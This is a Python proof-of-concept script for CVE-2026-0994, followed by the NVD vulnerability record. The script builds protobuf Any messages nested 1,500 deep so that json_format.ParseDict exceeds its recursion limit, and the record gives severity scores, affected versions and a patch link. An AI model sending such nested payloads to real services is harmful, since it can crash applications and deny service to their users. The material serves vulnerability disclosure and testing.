CVE-2026-0994

from google.protobuf.json_format import ParseDict from google.protobuf import any_pb2 import sys # Create deeply nested Any messages to trigger DoS def create_nested_any(depth): """Create a deeply nested Any message structure""" inner = any_pb2.Any() inner.type_url = 'type.googleapis.com/google.protobuf.Any' current = inner for i in range(depth - 1): next_any = any_pb2.Any() next_any.type_url = 'type.googleapis.com/google.protobuf.Any' current.value = next_any.SerializeToString() current = next_any return inner # Test PoC for CVE-2026-0994 def test_cve_2026_0994(): print("Testing CVE-2026-0994: DoS via nested Any messages") print("Creating deeply nested Any structure...") # Create nested structure with depth exceeding Python recursion limit nested_any = create_nested_any(1500) # Convert to dict format for ParseDict nested_dict = { 'type_url': nested_any.type_url, 'value': nested_any.value } print(f"Attempting to parse nested Any with depth 1500...") try: result = any_pb2.Any() ParseDict(nested_dict, result) print("Parsing completed without error (unexpected)") except RecursionError as e: print(f"RecursionError triggered as expected: {e}") print("Vulnerability confirmed: max_recursion_depth bypassed") return True except Exception as e: print(f"Other error occurred: {type(e).__name__}: {e}") return False if __name__ == "__main__": test_cve_2026_0994()

{"cve": {"id": "CVE-2026-0994", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:06.840", "lastModified": "2026-04-09T14:19:17.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages.\n\nDue to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python’s recursion stack and causing a RecursionError."}, {"lang": "es", "value": "Hay una vulnerabilidad de denegación de servicio (DoS) en google.protobuf.json_format.ParseDict() en Python, donde el límite max_recursion_depth puede ser evitado al analizar mensajes anidados de google.protobuf.Any.\n\nDebido a que no se contabiliza la profundidad de recursión dentro de la lógica interna de manejo de Any, un atacante puede proporcionar estructuras Any profundamente anidadas que evitan el límite de recursión previsto, agotando finalmente la pila de recursión de Python y causando un RecursionError."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-674"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:protobuf:*:*:*:*:*:*:*:*", "versionEndIncluding": "33.4", "matchCriteriaId": "CF0F8C1C-5CDF-4758-864F-FFF2CBF7B00C"}]}]}], "references": [{"url": "https://github.com/protocolbuffers/protobuf/pull/25239", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}